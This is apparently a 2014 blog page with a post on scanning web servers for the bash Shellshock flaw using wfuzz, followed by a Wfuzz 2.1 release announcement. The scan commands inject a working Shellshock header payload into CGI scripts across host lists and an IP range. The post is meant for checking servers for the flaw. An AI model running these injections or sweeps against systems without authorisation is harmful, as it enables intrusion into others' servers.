Thursday, October 30, 2014

Scan for shellshock with wfuzz

In the last few weeks everyone has been talking about Shellshock, the vulnerability affecting bash and having security ramifications everywhere, from Web, DHCP or SSH servers to mail servers. It does not have any sense to extend this post trying to rehash what this vulnerability is about or why it is an issue, as by now there are thousands of other posts and articles about the Bash “Shellshock” vulnerability, you only have to do a quick search on the Internet.

The best way to test for the Shellshock vulnerability is to do a local check but if you are worried about your web server hosting a vulnerable /cgi-bin and you don't have shell access, there are plenty of free Shellshock on-line scanner tools such as:
  • http://shellshock.brandonpotter.com/
  • http://bashsmash.ccsir.org/
  • http://www.shellshocktest.com/
  • ...
Or tools like Qualys, Nessus, Nmap, Burp, Metasploit...  and a bunch of "quick-and-dirty” scans using simple Perl or Python scripts.

Of course, you can also use Wfuzz to check for internal or external affected Web servers easily, by injecting a payload in the User-agent, Referer or Accept headers against well known CGI scripts as follows (since v2.1 --ss switch allows you to filter responses containing the specified regex):
$ wfuzz.py -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -w cgis.txt http://localhost:8000/FUZZ                              
****************************************
* Wfuzz 2.1 - The Web Bruteforcer                      *
****************************************

Target: http://localhost:8000/FUZZ
Total requests: 389

==============================================
ID      Response   Lines      Word         Chars          Request  
==============================================

00250:  C=200      4 L         6 W           50 Ch        "/cgi-bin/test.cgi"

Total time: 0.725533
Processed Requests: 389
Filtered Requests: 388
Requests/sec.: 536.1568
You can also scan various hosts by supplying a list of hostnames, for example:
$ wfuzz.py -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -w hostslist.txt -w cgis.txt FUZZ/FUZ2Z
or by using an IP range (v2.1 allows you to use the -Z switch to ignore connection errors):
$ wfuzz.py -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -z range,0-255 -w cgis.txt -Z http://192.168.1.FUZZ/FUZ2Z

Happy hunting,

Friday, October 24, 2014

Wfuzz 2.1 released !

I'm pleased to announce  a new version of WFuzz!

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc.), bruteforce GET and POST parameters for checking different kind of injections, bruteforce forms parameters (User/Password), Fuzzing,etc.

I have been working intermittently on this release since October 2011, being almost finished several times but always leaving it aside at the last moment due to work. A few weeks ago I decided to finish it whatever it took.

This version is a major change from the previous releases as it is almost totally rewritten, leaving not much of the old wfuzz 1.4, hoping for the best.

The biggest change is that wfuzz now supports plugins, so you can code your scripts and improve or modify the application's functionality. For example, there is a plugin that parses links within the HTTP response and these will be added to the fuzzing queue. Check below how a single word "a" generates 8 different requests:


 $ python wfuzz.py --script=links -z list,a --follow  http://localhost:8000/FUZZ
********************************************************
* Wfuzz 2.1 - The Web Bruteforcer                      *
********************************************************

Target: http://localhost:8000/FUZZ
Total requests: 1

===========================================
ID      Response   Lines      Word         Chars          Request  
===========================================
00000:  C=200     17 L        89 W         1481 Ch        "a"
  |_ Plugin links enqueued 5 more requests (rlevel=1)
00001:  C=200     14 L        57 W          889 Ch        "/a/b/"
  |_ Plugin links enqueued 2 more requests (rlevel=2)
00002:  C=200      4 L        25 W          177 Ch        "/"
00003:  C=200      9 L         7 W           61 Ch        "/a/test.html"
00004:  C=200      4 L         6 W           47 Ch        "/a/test.js"
00005:  C=403     10 L        30 W          285 Ch        "/icons/"
00006:  C=200     17 L        89 W         1481 Ch        "/a/"
00007:  C=200     14 L        57 W          895 Ch        "/a/b/c/"
  |_ Plugin links enqueued 1 more requests (rlevel=3)
00008:  C=200     13 L        46 W          716 Ch        "/a/b/c/d/"

The project has been moved from Google code to Github. For a full list of the new features, check the Wfuzz v2.1 changelog.

Download the latest version at: